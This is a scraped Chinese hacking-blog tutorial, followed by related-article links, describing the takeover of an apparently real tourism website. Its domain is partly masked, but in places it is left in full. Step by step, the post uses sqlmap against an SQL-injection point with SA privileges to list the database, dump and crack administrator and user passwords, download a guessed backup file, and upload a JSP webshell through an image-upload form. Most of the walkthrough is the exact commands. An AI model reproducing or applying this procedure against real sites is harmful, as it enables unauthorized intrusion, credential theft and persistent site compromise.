sqlmap实例拿站
http://www.myhack58.com/Article/html/3/8/2012/35324.htm
目标:
http://www.djj.com/yz/cn/videodt.jsp?Videoid=10
此URL为sa权限猪肉一块
用穿山甲不能执行命令
过程如下:
通过访问
http://www.djj .com/login.jsp
得知该站由一论坛搭建
注册普通用户访问
http://www.djj .com/admin/index.htm
得知该站由
http://www.easyjforum.cn/ejf_download.jsp
EasyJForum 论坛程序改编而来。
既然有了SA权限的注入点那就祭出神器sqlmap来跑下注入点
启动BT5,打开sqlmap,输入命令
python ./sqlmap.py -u http://www.yangzhoutour.com/yz/cn/videodt.jsp?Videoid=10
检测结果如图:
目标数据库为:Microsoft SQL Server2005
接着执行命令:
python ./sqlmap.py -u http://www.djj.com/yz/cn/videodt.jsp?Videoid=10 –current-db –current-user
执行结果如图:
得到当前用户为:sa
数据库名:tour-2010-11-24
接下来我们列下表执行:
python ./sqlmap.py -u http://www.djj.com/yz/cn/videodt.jsp?Videoid=10 –tables -D tour-2010-11-24
列出全部表如图:
过下载EasyJForum 原程序找到论坛后台用户表以及相关用户密码字段
执行命令:
python ./sqlmap.py -u http://www.yangzhoutour.com/yz/cn/videodt.jsp?Videoid=10 –columns -T ejf_user users-D tour-2010-11-24 -v 0
在列出的用户名和密码列表中发现此用户
破解后得到
账户:administrator
密码:administrator
用得到的用户信息尝试登陆
http://www.djj.com/admin/index.htm
成功进入,在后台浏览了一遍没有找到拿shell方法。不过发现了一个这个功能
现在有两个方法拿shell了:
1. 通过修改管理员联系邮箱为自己邮箱地址然后通过数据备份功能将网站目录备份发送到我的邮箱
2. 通过上图猜测管理员应该执行过备份。可以通过下载备份文件得到数据库配置等信息拿shell。
我直接访问域名+1.rar,下载了该备份文件。
在该备份文件中查找到了网站真正后台地址:
http://www.djj.com/yz/Manage/admin_login.jsp
以及用户表及相关用户名和密码的字段
表名:GlUserInfo
用户:username
密码:password (MD5加密后40位)
真正密码:passwd(未加密明文 )
执行命令:
python ./sqlmap.py -u http://www.djj.com/yz/cn/videodt.jsp?Videoid=10 –dump -C username,passwd,password -T gluserinfo -D tour-2010-11-24 -v 0
得到用户及密码:
使用得到的用户名和密码登陆后台,找个上传图片的地方直接上传了jspshell。
sqlmap实例拿站相关推荐
- SQLMAP 实例COOKBOOK
lxj616 · 2014/03/30 10:52 提醒:本文章中的所有例子均已通过乌云平台通知厂商,并按照流程已经公开(未公开的会有标识并且隐藏信息,请等待公开后自行查看),请在阅读文章的同时不要对 ...
- echarts图表案例和实例资源站整理
资源一:分享你我 (推荐指数:⭐⭐⭐⭐) 优点:案例资源丰富,有主体分类,可检索,访问速度较快. 缺点:未做分页. 资源二:ISWWQ.com (推荐指数:⭐⭐⭐⭐) 优点:案例资源丰富,可检索,有主 ...
- sqlmap md5怎么解密_三十九,hackthebox渗透之DirBuster扫描路径及Sqlmap
一.DirBuster扫描目录 hack the box是一个在线Web渗透实验平台,能帮助你提升渗透测试技能和黑盒测试技能,平台上有很多靶机,从易到难,各个级别的靶机都有.因为这些靶机放在平台上供大 ...
- 阿里云自助建站方式汇总
本文汇总了阿里云各类型网站的部署方式,便于您自助搭建网站. 网站类型 部署方式 说明 WordPress 镜像部署 WordPress 是一款常用的搭建个人博客网站的软件.您可以用WordPress架 ...
- 服务器iis短文件名漏洞,IIS短文件名漏洞分析及一个实例
漏洞成因 为兼容16位MS-DOS程序,Windows为文件名较长的文件(文件夹)生成了对应的windows8.3短文件名. 并且在Windows下查看对应的短文件名,可以使用命令 dir /x. 此 ...
- mysql盲注脱裤_BT5下使用SQLMAP入侵加脱裤 -电脑资料
早就听说BT5下的sqlmap功能很强大,今天终于下决心拒绝DOTA和苍老师的诱惑,静下心来研究研究这个传说中的sqlmap!由于在虚拟机里面用的 ,我直接在真机上也装了个BT5的系统,嘻嘻··,那感 ...
- 给菜鸟站长的全面易懂的建站教程!
摘要: 史上最全建站教程.常用镜像,一键触达. 为了方便您搭建网站,文档君汇总了阿里云云市场上最常用的应用镜像的使用教程,并提供了教程和云市场镜像的链接,让您一键触达,轻松建站. 熟悉搭建云服务器环境 ...
- sqlmap 注入字典_使用sqlmap进行sql注入
早就听说BT5sqlmap功能很强大,今天终于下决心拒绝DOTA和苍老师的诱惑,静下心来研究研究这个传说中的sqlmap!由于在虚拟机里面用的蛋疼,我直接在真机上也装了个BT5的系统,嘻嘻··,那感觉 ...
- SQLMAP工具 详细使用方法
文章目录 SQLMAP简介 SQLMAP支持的注入模式 SQLMAP支持的数据库 SQLMAP安装 Linux: Windows: 更新 SQLMAP参数详解 使用 Options Target Re ...
最新文章
- 【STM32】keil软件常用使用技巧
- html 图片 高度无效_HTML笔记(详细)
- 自学html代码,新手学HTML代码的简易方法
- linux 线程的运行时间吗,Linux下巧用ps得到运行线程个数和线程启动时间
- java中序列化之子类继承父类序列化
- php实例新讲php,实例讲解PHP5 新特性
- docker镜像启动后端口号是多少_java项目docker云化入门
- android迷宫源代码,迷宫 c++源代码(Maze c++ source code).doc
- 海量数据挖掘MMDS week6: MapReduce算法(进阶)
- 人工智能白皮书(2022年)
- 会议论文有影响因子吗_会议论文和期刊论文的区别
- cc9.3 indesign_Adobe InDesign CC2019
- 文件系统测试工具IOZONE
- 猝死理赔年轻化,恶性肿瘤仍为头号健康“杀手”
- JavaScript案例:页面自动跳转到首页
- c++ vector容器emplace_back
- 隐藏和isa :进化返祖以及白马非马(c++)
- java ee页面间怎么传值_jsp页面间常见的几种传值方式
- MYSQL语句按中文拼音排序
- VC++中的各种文件的作用